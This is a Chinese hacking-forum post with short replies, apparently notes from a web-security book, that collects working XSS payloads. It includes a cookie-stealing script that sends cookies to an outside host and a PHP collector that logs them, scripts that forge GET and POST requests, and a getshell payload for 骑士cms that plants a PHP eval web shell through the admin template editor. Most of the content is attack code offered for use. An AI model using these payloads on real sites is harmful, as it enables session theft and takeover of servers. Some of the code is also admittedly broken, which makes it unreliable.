查看: 9458|回复: 5

【原创】XSS Payload

[复制链接]
  • TA的每日心情

    2016-5-24 16:08
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2012-7-30 21:18:42 | 显示全部楼层 |阅读模式
    本帖最后由 L.N. 于 2012-7-30 21:34 编辑

    注意代码中的url连接有问题!没法修改!

    xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等。

    1.盗取cookie,发起cookie劫持
    使用xss漏洞插入cookie.js
    cookie.js代码:



    1. var img = document.createElement("img");

    2. img.src = [url=http://lanu.sinaapp.com/cookie.php?cookie=+escape(document.cookie]http://lanu.sinaapp.com/cookie.php?cookie=+escape(document.cookie[/url]);

    3. document.body.appendChild(img);
    复制代码

    cookie.php代码


    1. <?php

    2.     $file = fopen("cookie.txt","a");

    3.     fwrite($file,$_GET['cookie']);

    4.     fclose($file);

    5. ?>
    复制代码

    2.构造GET和POST请求
    get.js代码:


    1. var img = document.createElement("img");

    2. img.src = "一个可以使用的get请求链接";

    3. document.body.appendChild(img);
    复制代码

    post.js代码:
    代码1:(DOM节点方式)


    1. var f = document.createElement("form");

    2. f.action ="";

    3. f.method = "post";

    4. document.body.appendChild(f);

    5. var i1 = document.createElement("input");

    6. i1.name = "xxx";

    7. i1.value = "xxxx";

    8. f.appendChild(i1);

    9. var i2 = document.createElement("input");

    10. i2.name = "aaa";

    11. i2.value = "aaa";

    12. f.appendChild(i2);

    13. f.submit();
    复制代码

    代码2:


    1. var dd = document.createElement("div");

    2. document.body.appendChild(dd);

    3. dd.innerHTML ='<form action="" method="post" id="xssform"
    4. name="mbform">'+'<input type="hidden" value="xxxx" name="xxx"
    5. />'+'<input type="text" value="aaaa" name="aaa"
    6. />'+'</form>';

    7. document.getElementById("xssform").submit();
    复制代码

    代码3:(使用XMLHttpRequest)


    1. var url = "http://lanu.sinaapp.com";

    2. var postStr = "aaa=aaaa&xxx=xxxx";

    3. var ajax = null;

    4. if(windows.XMLHttpRequest)

    5. {

    6.     ajax = new XMLHttpRequest();

    7. }

    8. else if(window.ActiveXObject)

    9. {

    10.     ajax = new
    11. ActiveXObject("Microsoft.XMLHTTP");//ie6和一下老版本

    12. }

    13. else

    14. {

    15.     return;

    16. }

    17. ajax.open("POST", url , true);

    18. ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

    19. ajax.send(postStr);

    20. //ajax.open("GET", url, true);

    21. //ajax.send(null);

    22. ajax.onreadystatechange = function()

    23. {

    24.     if(ajax.readyState == 4 && ajax.status == 200)

    25.     {

    26.         //alert("Done!");

    27.     }

    28. }
    复制代码


    -------------------
    3.xss钓鱼
    4.浏览器识别和用户安装软件识别
    1. [url=http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/]http://www.thespanner.co.uk/2009/01/29/detecting-browsers-javascript-hacks/[/url]
    复制代码
    [/url]
    5.css history hack
    1. [url=http://ha.ckers.org/weird/CSS-history-hack.html]http://ha.ckers.org/weird/CSS-history-hack.html[/url]
    复制代码
    [/url]

    读《白帽子讲web安全》笔记
    ---------------------
    xxs payload getshell 实例:
    骑士cms getshell

    //构造好的能写入一句话的连接

    1. var
    2. Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6';

    3. try

    4. {

    5. //调用XMLHttpRequest
    6.     var xml = window.XMLHttpRequest ?
    7. (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP'));

    8.    
    9. xml.open("POST",'admin_templates.php?act=do_edit',false);
    10.    
    11. xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');

    12.     xml.onreadystatechange = function()
    13.    
    14. {
    15.         if(xml.readyState == 4)

    16.         {

    17.         }
    18.    
    19. }
    20.     xml.send(Shelldata);
    21. }
    22. catch(e)

    23. {

    24. }

    复制代码

    评分

    参与人数 2i币 +40 收起 理由
    N.O + 20 很给力!
    s0mewhat + 20

    查看全部评分

    回复

    使用道具 举报

  • TA的每日心情

    2015-8-10 09:55
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-7-30 21:20:27 | 显示全部楼层
    两金币
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2017-3-14 17:06
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2012-7-30 21:23:28 | 显示全部楼层
    不错。。。。顶
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-7-30 21:23:40 | 显示全部楼层
    打到地主老财
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2012-7-30 21:24:53 | 显示全部楼层
    顶起!!!!!!!!!!!!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    1439171714
  • 签到天数: 1 天

    发表于 2012-7-30 21:28:04 | 显示全部楼层
    getshell  给力哇。
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-4-29 07:01 , Processed in 0.038909 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部